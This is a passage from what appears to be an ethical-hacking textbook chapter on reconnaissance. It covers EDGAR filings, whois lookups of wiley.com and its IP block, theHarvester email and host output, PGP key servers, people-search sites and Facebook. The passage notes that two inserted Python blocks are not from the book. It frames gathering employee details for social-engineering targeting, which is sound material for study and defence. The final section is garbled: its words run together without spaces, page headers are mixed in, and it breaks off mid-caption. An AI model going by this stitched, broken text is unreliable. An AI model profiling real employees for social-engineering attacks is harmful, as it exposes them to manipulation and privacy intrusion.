There are a lot of places you, as an ethical hacker, can get information about your targets, though. Open source intelligence is the term that describes identifying information about your target using freely available sources. There are other places where you can acquire information in other than legal ways, and of course, you could directly infiltrate a company’s physical locations to get some information that you can use against your target. That’s potentially illegal and definitely not open source.

The objective here is to acquire data that you need without tipping off your target that you are doing it. This is why you might use third-party sources to acquire the information you need. You can also gather a lot of details by interacting with services at the target in ways that would be expected. As an example, you might visit their website requesting pages, just as any other visitor to their site might do. Nothing special about what you are asking for or how you are asking for it. However, if you know where to look, you can gather a lot of information about systems and technology in use by your target.

One source of a lot of detail about your target is the Domain Name System (DNS). This isn’t something a lot of people spend time thinking about. When it works, you have no idea because it happens quietly in the background. However, there is a lot of data stored in DNS servers about domains and even IP address blocks. This data can be mined, and you can get a better understanding about your target and systems and the IP address blocks that may be associated with your target.

It may be useful as you work through the different stages of a testing methodology to identify matches to the MITRE ATT&CK Framework. We’re in luck on this phase. The ATT&CK Framework has a reconnaissance phase, and it covers scanning as well as gathering information from different sources about different aspects of the target. While it’s common to think that attackers are looking for vulnerabilities and systems of interest, they are probably more likely to look for human targets. This may be identifying employees and email addresses but also, perhaps just as important, knowing what those employees do, which will tell the attacker how much access they have. More access means an attacker may be able to get to something that can easily be monetized.

Over the course of this chapter, we’ll go over sources of information about your target as well as the tools you would use to gather that information. While much of it is quiet and there is at least one tool that is entirely passive, there is some active investigation as well. The first place to start, though, is how to use open sources of data to identify a jumping-off point for getting information about your target.

Open Source Intelligence

There are a couple of reasons you may want to use open source intelligence. The first is that you haven’t been provided with any details about your target. You may be doing a true red team against the target company and systems. In that case, you need to locate as much information as you can so you know not only what your attack surface looks like but possible ways in. Additionally, you can find a lot of information about individuals within an organization. This is especially useful because social engineering attacks have a good possibility of success. Having contacts to go after is essential.

The second reason is that organizations aren’t always aware of the amount of information they are leaking. As noted earlier, attackers can find footholds, as well as potential human targets for social engineering attacks. If you are working hand in hand with the company you are performing testing for (that is, you are doing white-box testing), you don’t need to use open source intelligence for starting points, but you should still gather what information is available for the awareness of the company. They may be able to limit their exposure. Even if there isn’t anything that could be pulled back, they could work on awareness so employees and the organization as a whole aren’t leaking information unnecessarily.

There are a number of tools that can be used to automate the collection of information, and we’ll cover their use as part of looking at how to gather open source intelligence about companies and people. We’ll also take a look at social networking sites and some of the ways those websites can be used. Even in cases where privacy settings are locked down, there is still a lot of information that can be gathered. There are also sites that exist to be public, and those can definitely be used.

Companies

There are several starting points when it comes to acquiring open source intelligence about your target. The first is to look at the company overall. You’ll want to gather information about locations the company has. There are instances where this can be easy. However, increasingly, it can be harder. The reason it can be harder is that companies recognize that the more information they provide, the more that information can be used against them. So, unless they are required to provide that information by regulations, they don’t provide it.

There are a few resources that can be used to gather information about companies. Sometimes, these resources can be used to gather information that may be used for social engineering attacks. In some cases, you will be able to gather details about a company’s network. Both types of information can be useful. Details about a company and its
organizational and governance structure can come from a database maintained by the U.S. government, in the case of businesses registered here. Details about the business network may come from databases maintained by the organizations that are responsible for governance of the Internet.

EDGAR

Public companies are required to provide information about themselves. There are resources you can use to look up that information. In the process, you may gather information about a company’s organizational structure. The organizational structure can tell you who has what position, so when you are working on sending out email messages to gather additional information later, you know who they should appear to be from. You can select the holder of an appropriate position.

The Securities and Exchange Commission (SEC) has a database that stores all public filings associated with a company. The Electronic Data Gathering, Analysis, and Retrieval (EDGAR) system can be used to look up public filings such as the annual report in the form 10-K. Additionally, the quarterly reports, 10-Qs, are also submitted to EDGAR and stored there. These reports provide details about a company’s finances. The 11-K, a form including details about employee stock option plans, is also filed with EDGAR. Accessing EDGAR is as easy as going to EDGAR at the SEC website. You can see the search field, part of the page, in Figure 4.1.

FIGURE 4.1 EDGAR site

One of the most useful forms you can find in EDGAR is Schedule 14-A, which is a proxy statement and will include the annual report to the shareholders, which may include a lot of useful information for you. As an example, Figure 4.2 shows a very small section of the annual report to the shareholders for Microsoft Corporation. Other sections that are not shown include Corporate Governance at Microsoft, Board of Directors, and Audit Committee Matters. While at a high level, what is included in these reports will be the same across all public companies, there may be some companies that present more in the way of specific details than other companies. Some companies will have more to report than others. For instance, the table of contents for the Microsoft report shows the page total in the 80s. The report for John Wiley & Sons shows a page count in the 50s. That’s about 30 fewer pages between the two companies.

FIGURE 4.2 Portion of Schedule 14-A for Microsoft

Domain Registrars

EDGAR is only for public companies. Not every company is public. You don’t get the same level of insight for a private company that you do for a public company. However, EDGAR is not the only resource that can be used to gather information about a company. Another source of information, related to the Internet itself, is the domain registrars. You won’t get the same sort of information from the domain registrars as you would from EDGAR, but it’s still sometimes a decent source of information. For a start, you can get the address of what is probably the company’s headquarters. This is not a guarantee, however. As mentioned, companies are starting to hide information provided to the registrars. Information is hidden behind the registrar. When you ask for information, you will get what the registrar has been asked to present and not necessarily the real details. There is nothing that says that the registrars have to be provided with real addresses, unless they are checking a billing address on a credit card for payment. In fact, there have been times I have had domains registered with bogus phone numbers and incorrect addresses. Since the data is public, it’s important to be careful about what is shared. Anyone can mine the registries for this information and use it for any number of purposes.
Before we get too far down this road, though, it’s probably useful for you to understand how the Internet is governed when it comes to domains and addresses. First, there is the Internet Corporation for Assigned Names and Numbers (ICANN). Underneath ICANN is the Internet Assigned Numbers Authority (IANA), which is responsible for managing IP addresses, ports, protocols, and other essential numbers associated with the functioning of the Internet. Prior to the establishment of ICANN in 1998, IANA’s functions were managed by one man, Jon Postel, who also maintained the request for comments (RFC) documents.

In addition to ICANN, responsible for numbering, are the domain registrars. These organizations store information about addresses they are responsible for as well as contacts. There was a time when registering a domain and other data went through a single entity. Now, though, there are several companies that can perform registrant functions. If you want to register a domain, you go to a registrar company like DomainMonger or GoDaddy. Those companies can then be queried for details about the domains.

To grab information out of the regional Internet registry (RIR), you would use the whois program. This is a program that can be used on the command line on most Unix-like systems, including Linux and macOS. There are also websites that have implementations of whois if you don’t have a Unix-like system handy. Here you can see a portion of the output from a whois query.

whois Query of wiley.com

$ whois wiley.com
% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object

refer:        whois.verisign-grs.com

domain:       COM

organisation: VeriSign Global Registry Services
address:      12061 Bluemont Way
address:      Reston Virginia 20190
address:      United States

contact:      administrative
name:         Registry Customer Service
organisation: VeriSign Global Registry Services
address:      12061 Bluemont Way
address:      Reston Virginia 20190
address:      United States
phone:        +1 703 925-6999
fax-no:       +1 703 948 3978
e-mail:       [email protected]-grs.com

<-- SNIP -->

Domain Name: wiley.com
Registry Domain ID: 936038_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.corporatedomains.com
Registrar URL: www.cscprotectsbrands.com
Updated Date: 2017-10-07T05:19:30Z
Creation Date: 1994-10-12T04:00:00Z
Registrar Registration Expiration Date: 2019-10-11T04:00:00Z
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar IANA ID: 299
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +1.8887802723
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Domain Administrator
Registrant Organization: John Wiley & Sons, Inc
Registrant Street: 111 River Street
Registrant City: Hoboken
Registrant State/Province: NJ
Postal Code: 07030
Registrant Country: US
Registrant Phone: +1.3175723355
Registrant Phone Ext:
Registrant Fax: +1.3175724355
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: John Wiley & Sons, Inc
Admin Street: 111 River Street
Admin City: Hoboken
Admin State/Province: NJ
Postal Code: 07030
Admin Country: US
Admin Phone: +1.3175723355
Admin Phone Ext:
Admin Fax: +1.3175724355
Admin Fax Ext:
Admin Email: [email protected]

There is a lot of output there to look through, and I’ve snipped out a bunch of it to keep it to really relevant information. First, whois checks with IANA’s whois server to figure out who it needs to check with about this specific domain. You can see that happen at the very top of the output. IANA indicates that VeriSign is the registrar for this domain. We get the details about the registrar VeriSign. After that, and a lot of information being snipped out, we finally get the details about the domain wiley.com. What you can see in the output is the address and phone number for the company. Additionally, you get information about a handful of contacts for the company. Registrars expect an administrative contact and a technical contact.

As indicated earlier, not all domains will provide this level of detail. An example of a domain that doesn’t include any contact details is spamhaus.org. Here you can see that the contact information shows that the data has been redacted for privacy.

Details About spamhaus.org

Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: The Spamhaus Project
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CH
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 26a6047fb7bb1b2a0e5ea9927ed7f15c-[email protected]
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: a25006f8175341e32979e6f59e7b87ea-[email protected]
Using a strategy like this will keep information private and out of the hands of the very people spamhaus.org seeks to protect against. The data provided can be used to create a mailing list for spammers. It can also be used to create a physical mailing list for traditional junk mail providers (sometimes called mail marketing companies).

Regional Internet Registries

Not all the useful information is stored with the domain registrars, however. There is other data that is important to be kept. Earlier, we discussed IANA. While the IANA server provided information about domain registrars, its purpose has long been to be a central clearinghouse for addresses. This includes not only port numbers for well-known services but also IP addresses. IANA, at a high level, owns all IP addresses. It hands out those IP addresses, based on need, to the RIRs. The RIRs then hand them out to organizations that fall into their geographic region. There are five RIRs around the world. They are based in different geographic regions, and an organization would refer to the RIR where they are located for things like IP addresses. The RIRs and the geographic areas they are responsible for are listed here:

African Network Information Center (AfriNIC)  Africa
American Registry for Internet Numbers (ARIN)  North America (United States and Canada) as well as Antarctica and parts of the Caribbean
Asia Pacific Network Information Centre (APNIC)  Asia, Australia, New Zealand, and neighboring countries
Latin America and Caribbean Network Information Centre (LACNIC)  Latin America and parts of the Caribbean
Réseaux IP Européens Network Coordination Centre (RIPE NCC)  Europe, Russia, West Asia, and Central Asia

All of these RIRs have their own databases that can be queried using whois, just as we used whois to query information from the domain registrars. Typically, you would use whois against the RIRs to find out who owns a particular IP address. For example,in the output for wiley.com earlier, part of the output indicated which name servers the domain uses to resolve hostnames to IP addresses. One of those name servers is ns.wiley.co.uk. With a minimal amount of effort (we will cover the DNS later in the chapter), we can discover that the hostname ns.wiley.co.uk resolves to the IP address 193.130.68.19. Using whois, we can find out who owns that IP address. You can see the results of that query in the following code.

whois Query for IP Address

$ whois 193.130.68.19
% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object

refer:        whois.ripe.net

inetnum:      193.0.0.0 - 193.255.255.255
organisation: RIPE NCC
status:       ALLOCATED

whois:        whois.ripe.net

changed:      1993-05
source:       IANA

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '193.130.68.0 - 193.130.69.255'

% Abuse contact for '193.130.68.0 - 193.130.69.255' is '[email protected]'

inetnum:        193.130.68.0 - 193.130.69.255
netname:        WILEY-UK
descr:          John Wiley & Sons Ltd
country:        GB
admin-c:        TW1873-RIPE
tech-c:         TW1873-RIPE
status:         ASSIGNED PA
mnt-by:         AS1849-MNT
created:        1970-01-01T00:00:00Z
last-modified:  2010-12-29T09:52:04Z
source:         RIPE # Filtered

person:         Tony Withers
address:        John Wiley & Sons Ltd
address:        Baffins Lane
address:        Chichester
address:        Sussex
address:        PO19 1UD
address:        England, GB
phone:          +44 243 770319
fax-no:         +44 243 775878
nic-hdl:        TW1873-RIPE
created:        1970-01-01T00:00:00Z
last-modified:  2016-04-05T14:15:57Z
mnt-by:         RIPE-NCC-LOCKED-MNT
source:         RIPE # Filtered

% Information related to '193.130.64.0/18AS702'

route:          193.130.64.0/18
descr:          UK PA route
origin:         AS702
member-of:      AS702:RS-UK, AS702:RS-UK-PA
inject:         upon static
aggr-mtd:       outbound
mnt-by:         WCOM-EMEA-RICE-MNT
created:        2018-04-16T14:25:12Z
last-modified:  2018-04-16T14:25:12Z
source:         RIPE

This provides us with a lot of useful information. First, even though we provided a single IP address, addresses are allocated in blocks. The first thing we find is that the parent block was allocated to RIPE, the European RIR, in 1993. The specific block the IP address provided belongs to, though, is 193.130.68.0–255. That block, unsurprisingly, belongs to John Wiley & Sons. You can see that the address for John Wiley & Sons is in Great Britain, which matches up with the RIR being RIPE. The business is located in England, so the corresponding regional registry is the one responsible for Europe. We’ve learned a couple of things about the business and the IP addresses that belong to it. Additionally, you can see we have a contact that came out of the response. This gives us a name and email address. If we were going to be testing against this business, we could make use of this information.
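Both whois listings in this section, the registrar record for a domain and the RPSL objects the RIR returns for an IP address, are plain "key: value" text, so they can be parsed and checked rather than read by eye. The following is an added example, not code from the book or from any whois client: it splits whois output into objects, reports for each contact role which fields a domain record exposes and which are "REDACTED FOR PRIVACY" (the difference between the wiley.com and spamhaus.org listings), and for an IP address picks the most specific inetnum, resolves its admin-c handle to the person object and pulls the abuse contact from the comment line. The sample texts are trimmed excerpts of the listings above; the email addresses the book masks are replaced by constructed example.net placeholders.

```python
"""Parse registrar and RIR whois output (formats shown in this section).

Added example, not code from the book.  Samples are trimmed from the
wiley.com, spamhaus.org and 193.130.68.19 listings; masked email addresses
are replaced by constructed example.net placeholders."""
import ipaddress
import re

REDACTED = "REDACTED FOR PRIVACY"


def parse_whois_objects(text):
    """Split whois output into objects: '%'/'#' comment lines are dropped, a
    blank line ends an object, trailing '# Filtered' style comments are removed
    and repeated keys (several address: lines) are kept in order as a list."""
    objects, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                objects.append(current)
            current = {}
            continue
        if line[0] in "%#":
            continue
        key, sep, value = line.partition(":")
        if sep:
            value = re.sub(r"\s+#.*$", "", value.strip())
            current.setdefault(key.strip().lower(), []).append(value)
    if current:
        objects.append(current)
    return objects


def contact_exposure(domain_record, roles=("registrant", "admin", "tech")):
    """Per contact role, which fields are populated and which are redacted.
    Handy for reviewing what your own domain registration publishes."""
    report = {}
    for role in roles:
        exposed, redacted = [], []
        for key, values in domain_record.items():
            if key.startswith(role + " ") and values[0]:
                (redacted if values[0].upper() == REDACTED else exposed).append(key)
        report[role] = {"exposed": sorted(exposed), "redacted": sorted(redacted)}
    return report


def ip_ownership(text, ip):
    """Smallest inetnum containing ip (the RIR prints the parent allocation
    first and the assignment after it), its admin contact and abuse mailbox."""
    ip = ipaddress.ip_address(ip)
    objects = parse_whois_objects(text)
    best = None
    for obj in objects:
        if "inetnum" not in obj:
            continue
        first, last = (ipaddress.ip_address(p.strip()) for p in obj["inetnum"][0].split("-", 1))
        if first <= ip <= last and (best is None or int(last) - int(first) < best[0]):
            best = (int(last) - int(first), obj)
    if best is None:
        return None
    net = best[1]
    handles = {o["nic-hdl"][0]: o for o in objects if "nic-hdl" in o}
    admin = handles.get(net.get("admin-c", [None])[0], {})
    abuse = re.search(r"%\s*Abuse contact for '[^']+' is '([^']+)'", text)
    return {"inetnum": net["inetnum"][0], "netname": net.get("netname", [""])[0],
            "descr": net.get("descr", [""])[0], "country": net.get("country", [""])[0],
            "admin_contact": admin.get("person", [None])[0],
            "abuse_contact": abuse.group(1) if abuse else None}


# Constructed excerpts (see lead-in); blank lines separate RPSL objects.
WILEY_DOMAIN = """Domain Name: wiley.com
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registrant Name: Domain Administrator
Registrant Organization: John Wiley & Sons, Inc
Registrant Street: 111 River Street
Registrant City: Hoboken
Registrant State/Province: NJ
Registrant Country: US
Registrant Phone: +1.3175723355
Registrant Phone Ext:
Registrant Email: domain-admin@example.net
Admin Name: Domain Administrator
Admin Email: domain-admin@example.net
"""
SPAMHAUS_DOMAIN = """Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: The Spamhaus Project
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Country: CH
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: 26a6047fb7bb1b2a0e5ea9927ed7f15c-anonymized@example.net
Admin Name: REDACTED FOR PRIVACY
Admin Email: a25006f8175341e32979e6f59e7b87ea-anonymized@example.net
"""
RIPE_IP = """% IANA WHOIS server
refer:        whois.ripe.net

inetnum:      193.0.0.0 - 193.255.255.255
organisation: RIPE NCC
status:       ALLOCATED

% Abuse contact for '193.130.68.0 - 193.130.69.255' is 'abuse@example.net'

inetnum:        193.130.68.0 - 193.130.69.255
netname:        WILEY-UK
descr:          John Wiley & Sons Ltd
country:        GB
admin-c:        TW1873-RIPE
source:         RIPE # Filtered

person:         Tony Withers
address:        John Wiley & Sons Ltd
nic-hdl:        TW1873-RIPE
source:         RIPE # Filtered

route:          193.130.64.0/18
origin:         AS702
source:         RIPE
"""

if __name__ == "__main__":
    print(contact_exposure(parse_whois_objects(SPAMHAUS_DOMAIN)[0]))
    print(ip_ownership(RIPE_IP, "193.130.68.19"))
```

Run against your own domain and address blocks, contact_exposure shows exactly which names, phone numbers and mailboxes are published, and ip_ownership is the lookup an incident responder performs on an unfamiliar source address to find whom to notify.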
People

While systems and the IP addresses associated with them make good entry points for technical attacks—those against services that are available—contact information for people can be more useful. There are other places we can go to get lists of people who belong to a target organization. Again, there are utilities we can use to help us gather this information. One of them is theHarvester. This is a script that will search through different sources to locate contact information based on a domain name provided to the program. In the following code, you can see the output from theHarvester run against the domain wiley.com, using Google as the search source.

theHarvester Output

$ theharvester -d wiley.com -b google

*******************************************************************
*  TheHarvester Ver. 2.7.2                                        *
*  Coded by Christian Martorella                                  *
*  Edge-Security Research                                         *
*  [email protected]-security.com                                 *
*******************************************************************

[-] Starting harvesting process for domain: wiley.com

[-] Searching in Google:
    Searching 0 results...
    Searching 100 results...
    Searching 200 results...
    Searching 300 results...
    Searching 400 results...
    Searching 500 results...

Harvesting results

[+] Emails found:
------------------
[email protected]
[email protected]
cs-[email protected]
[email protected]
[email protected]

[+] Hosts found in search engines:
------------------------------------
Total hosts: 8

[-] Resolving hostnames IPs...
agupubs.onlinelibrary.wiley.com:65.156.1.101
authorservices.wiley.com:216.137.41.119
booksupport.wiley.com:208.215.179.132
eu.wiley.com:216.137.41.74
hub.wiley.com:204.93.79.243
newsroom.wiley.com:204.8.173.169
onlinelibrary.wiley.com:65.156.1.101
www.wiley.com:216.137.41.21

Google is not the only source that can be used with theHarvester. Another source that can be used, which may not be considered a lot, is a Pretty Good Privacy (PGP) key server. PGP relies on public keys to be available in publicly available key servers. Without these, the public key has to be shared manually by anyone who wants to get an encrypted message from someone else. Because these keys have to be available to be used, they are stored and searchable on web servers. Since they are associated with email addresses, you can search for email addresses on the key server. This may not always be successful. People who have been around for a long time may be more likely to have PGP keys. As an example, you can see the run results of theHarvester against one of my own domains. Since some of my email addresses have been around for more than 20 years, and since I’ve generally had a habit of rebuilding machines without storing off encryption keys, I have a few PGP keys. Interestingly, theHarvester wasn’t able to locate any of my PGP keys.

This leads us to other places to look for PGP keys. One of the older public key servers is hosted at the Massachusetts Institute of Technology (MIT). If you go to https://pgp.mit.edu, you can provide a search term, including a domain name. Searching using theHarvester didn’t turn up any entries for wiley.com. Doing the same search at https://pgp.key-server.io (MIT’s site was unresponsive for this search) resulted in a handful of results. However, because of the way the search in the database was conducted, the term wiley.com resulted in a number of people whose first name was Wiley, while the domain name their email address was in ended in .com.
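The theHarvester report above and a key server search are both text that an organization reviewing its own exposure will want to process rather than read by hand. The following is an added example, not code from the book, from theHarvester or from any key server software: it parses the "[+] Emails found" and resolved-host sections of a theHarvester-style report (keeping only results under the queried domain, since search engines return unrelated hits, as the wiley.com key search showed), parses the machine-readable index a PGP key server returns for an HKP lookup, and cross-references the two so you can see which published addresses also have public keys, and whether those keys are revoked. The report text and the index are constructed; the HKP URL helper assumes a server that supports the HKP "op=index&options=mr" query (the "pub:"/"uid:" colon-separated format), which SKS-style key servers such as the one at pgp.mit.edu have offered.

```python
"""Parse theHarvester output and an HKP key-server index, then cross-reference.

Added example, not code from the book, theHarvester or a key server.  The
report and index below are constructed (example.com placeholders)."""
import re
import urllib.parse
from datetime import datetime, timezone

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
HOST_IP_RE = re.compile(r"^(?P<host>[A-Za-z0-9.-]+):(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


def parse_harvester_report(text, domain):
    """Return (sorted emails, {host: ip}) from theHarvester's text report,
    keeping only entries under `domain`."""
    emails, hosts, section = set(), {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[+] Emails found"):
            section = "emails"
        elif line.startswith("[-] Resolving hostnames"):
            section = "hosts"
        elif line.startswith("["):            # any other "[+]"/"[-]" header
            section = None
        elif section == "emails" and EMAIL_RE.match(line) and line.lower().endswith("@" + domain):
            emails.add(line.lower())
        elif section == "hosts":
            m = HOST_IP_RE.match(line)
            if m and (m["host"] == domain or m["host"].endswith("." + domain)):
                hosts[m["host"]] = m["ip"]
    return sorted(emails), hosts


def hkp_index_url(server, query):
    """HKP lookup URL for a machine-readable index (assumed: server speaks HKP)."""
    return f"{server.rstrip('/')}/pks/lookup?" + urllib.parse.urlencode(
        {"op": "index", "options": "mr", "search": query})


def parse_hkp_index(text):
    """Parse 'pub:keyid:algo:bits:created:expires:flags' and
    'uid:escaped-uid:created:expires:flags' lines into a list of keys."""
    keys = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if parts[0] == "pub" and len(parts) >= 5:
            created = parts[4]
            flags = parts[6] if len(parts) > 6 else ""
            keys.append({
                "keyid": parts[1], "algo": parts[2], "bits": parts[3],
                "created": datetime.fromtimestamp(int(created), timezone.utc).date().isoformat() if created else None,
                "revoked": "r" in flags,
                "emails": [],
            })
        elif parts[0] == "uid" and keys:
            uid = urllib.parse.unquote(parts[1])      # "Name <addr>" is URL-escaped
            m = re.search(r"<([^>]+)>", uid)
            keys[-1]["emails"].append((m.group(1) if m else uid).lower())
    return keys


def cross_reference(emails, keys):
    """Map each harvested email to the key ids whose user IDs carry it."""
    return {e: [k["keyid"] for k in keys if e in k["emails"]] for e in emails}


# Constructed report in the layout of the theHarvester run above.
HARVESTER_REPORT = """[-] Starting harvesting process for domain: example.com

[-] Searching in Google:
    Searching 0 results...

Harvesting results

[+] Emails found:
------------------
press@example.com
cs-support@example.com
Webmaster@example.com
someone@unrelated-example.org

[+] Hosts found in search engines:
------------------------------------
Total hosts: 3

[-] Resolving hostnames IPs...
www.example.com:192.0.2.21
eu.example.com:192.0.2.74
notexample.com:198.51.100.5
"""
# Constructed HKP "options=mr" index: two keys, the older one revoked.
HKP_INDEX = """info:1:2
pub:0123456789ABCDEF:1:4096:1514764800::
uid:Press%20Office%20%3Cpress%40example.com%3E:1514764800::
pub:FEDCBA9876543210:1:2048:1262304000::r
uid:Old%20Key%20%3Cpress%40example.com%3E:1262304000::r
uid:Web%20Team%20%3Cwebmaster%40example.com%3E:1262304000::r
"""

if __name__ == "__main__":
    emails, hosts = parse_harvester_report(HARVESTER_REPORT, "example.com")
    print(hkp_index_url("https://pgp.mit.edu", "example.com"))
    for email, keyids in cross_reference(emails, parse_hkp_index(HKP_INDEX)).items():
        print(email, keyids or "no key on server")
```

The revoked flag is the detail to watch: an old, never-revoked key for an address you still use is what a correspondent will pick up from the server, which is the situation the author describes with several keys uploaded for one address.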
Using the MIT site to search for my own keys, I turned up all the keys I have loaded into the key servers over the years. This is a way to look up information about individual people if you need to, since theHarvester requires that you provide a domain name. In my case, you can see the output from the search in Figure 4.3. My primary email address has three different keys associated with it. As I said, I had a habit of rebuilding or moving to different machines without ever storing my private key. This meant, if I wanted to do any PGP encrypted email, I had to regenerate a key and reupload. Since the key signature is different, it doesn’t overwrite the other key. It’s possible, after all, I could have a few legitimate keys that are all used on different systems.

FIGURE 4.3 PGP key server search

While tools like theHarvester are good for identifying information about people at a company automatically, you may want or need to go deeper. This is where you might consider using a people search website, like Pipl, Wink, or Intelius. These sites can be used to search for people. A site like Pipl can be used to identify an online presence for someone. For example, using my name turns up a handful of posts to mailing lists, as well as a Twitter account I don’t use. There are also a few other references that aren’t me. You can see a sample of the output of Pipl in Figure 4.4. There are other people search sites that are more focused on looking at social networking presence, and searches can be done using usernames. The website PeekYou will do people searches using real names, just as we did with Pipl. PeekYou also allows you to look for a username instead, though. This username could be found across multiple social network sites, as well as other locations where a username is exposed to the outside world. A search for a username I have used in the past turned up a few hits, though the information was badly out of date and inconsistent. An online presence, though, can be used for more than just finding people.

FIGURE 4.4
PiploutputSocialNetworkingSocialnetworkingsitesarehowpeopleconnect.Theycomeinanumberofdifferentflavorsandhavebeenaroundformorethantwodecades,withthefirstone,sixdegrees.com,launchedin1997.SiteslikeMyspacehavealloweduserstosharemusicandpersonalinformationwithothers.Facebookhasalloweduserstocreatecommunities,sharenewsandinformation,andgetbackintouchwithpeopletheyhavefallenawayfrom.Twitterisoftenusefulfornewsandupdates,aswellasmarketinginformation—­makingannouncements,forexample.LinkedInisusefulforallsortsofbusinesspurposes.Thisincludessharingupdatesaboutcompanyactivities,personalachievements,andmoves.Youcanspendalotoftimelookingforinformationbyhandonthesesites.Therearealsotoolsthatyoucanuse.Oneofthemisonewe’vealreadylookedat.InadditiontousingtraditionalsearchsiteslikeGoogleandBing,theHarvesterwillalsosearchthroughsomeofthesocialnetworksites.Therearealsotoolsthatarespecifictosomeofthesites,suchasLinkedIn.Finally,wehaveatoollikeMaltego,whichisgoodforopensourceintelligenceingeneral,thoughtherearewaysitcanbeusedtosearchsocialnetworksitesfordetailsaboutpeopleandcompanies.FacebookWhilesitesthatmayprimarilybethoughtofaspersonalsitesmayfocusmoreonindividuals,theyarestillusefulforsomeonedoingworkasanethicalhacker.AsitelikeFacebook112 Chapter4  Footprintingand Reconnaissance■isinterestingbecausepeopleseemtolettheirguarddownthere,postingalotofdetailsthatperhapstheyshouldn’t.Whattheyoftenfailtorealizeishowmuchofwhattheypostissearchable.Overtime,Facebookhasvastlyimprovedhowmuchinformationcanbeacquired,thoughit’sstillnotgreat.Severalyearsago,therewasawebsite,www.weknowwhatyouredoing.com,thatsearchedthroughFacebookpoststhatwouldfallintooneoffourcategories—­whowantstogetfired,whoishungover,whoistakingdrugs,andwhohasanewphonenumber.Figure 4.5showssomeofthepostsfromthesitebeforeitgottakendownbecausetheapplicationprogramminginterface(API)itusedisnolongeravailable.FIGURE 4.5 
www.weknowwhatyouredoing.comThisisnottosaythatFacebooknolongerhasanAPI.TheFacebookGraphAPIstillexists.Itjustisn’tasopenasitoncewas.ThereisstillaGraphAPI,anditcanstillbeusedinapplications.Infact,FacebookprovidesaGraphAPIExplorerwherequeriestotheAPIcanbetested.Figure 4.6showstheGraphAPIExplorer.Nearthetop,youcanseethereisanaccesstoken.Thistokenisgeneratedafteranumberofpermissionsareselected.Thetokenisbasedontheuseryouareloggedinas.Onceyouhaveatoken,youcangenerateaquery.Thequeryshownisthedefaultquery,requestingtheIDandnamefortheuser.Ofcourse,thenameisminesincetheaccesstokenwasbasedonmylogin.OpenSourceIntelligence 113FIGURE 4.6 FacebookGraphAPIYoudon’thavetocreateanapplication,though,togeneratesearches.Searchescanbedonemanually.Facebookisnotonlyusedbyindividuals.Itisalso,often,usedbycompanies.Manycompaniescreatetheirownpagewheretheycanpostspecificsabouttheirproductsandservices.Thisisanotherlocationwhereyoucangatherinformationaboutthecompany.Figure 4.7showsbusinessdetailsaboutJohnWiley&SonsfromitsownpageinFacebook.Besidestheinformationyoucanseeaboutitslocation,thereareseveralothercategoriesofinformation,suchasReviews,Posts,andCommunity.Thereviewscansometimesprovideenlighteninginformation,andofcourse,thereisthecontactinformationprovided.FIGURE 4.7 JohnWiley&Sonsinformation114 Chapter4  Footprintingand 
Reconnaissance■Youdon’thavetorelyonjustlookingupbusinessinformationinFacebook,though.Peopleregularlypostdetailsabouttheiremployersontheirpersonalpages.Unfortunately,thisiswheresearchinginFacebookcanbecomechallenging.Youcan’t,afterall,justsearchforallemployeesofaparticularcompanyusingtheusualsearch.However,ifyouhavefoundsomenamesofemployeesusingothermeans,youcanusethosenamestofindtheirpagesandreadtheirstatusposts.Often,peoplewillincludedetailsoftheirworksituation—­companiestheydoworkforandhaveworkedfor—­aspartoftheirprofile.Thiscanhelpyoutobetterdistinguishtheemployeesfromotherpeoplewiththesamename.Muchofthisreliesonpeoplesettingtheirprivacyoptionscorrectly.Thisisnotalwaysdone,whichmeansyoucanprobablyreadthepostsofalotofpeopleyouarelookingfor.Youcanalsolikelylookattheirphotos.Inanageofsocialmediaandtheexpectationthatyoucanfindoutjustaboutanythingyouwantaboutsomeone,peopleoftendon’tthinkaboutwhocanpotentiallyseetheirpostsandphotos.Thisgivesusanadvantage.However,itisn’talwaysthecasethatyouwillbeabletoseewhatsomeoneisdoingandsaying.Figure 4.8showsthedifferentprivacysettingsavailabletoFacebookusers.Oneofthechallengeswiththis,though,isthatitonlypertainstowhatyoudo.Thiswon’tpreventotherpeoplefromseeingwhensomeonesharesoneofyourpostsorphotos.Thenitcomesdowntowhattheirpermissionsaresetto.FIGURE 4.8 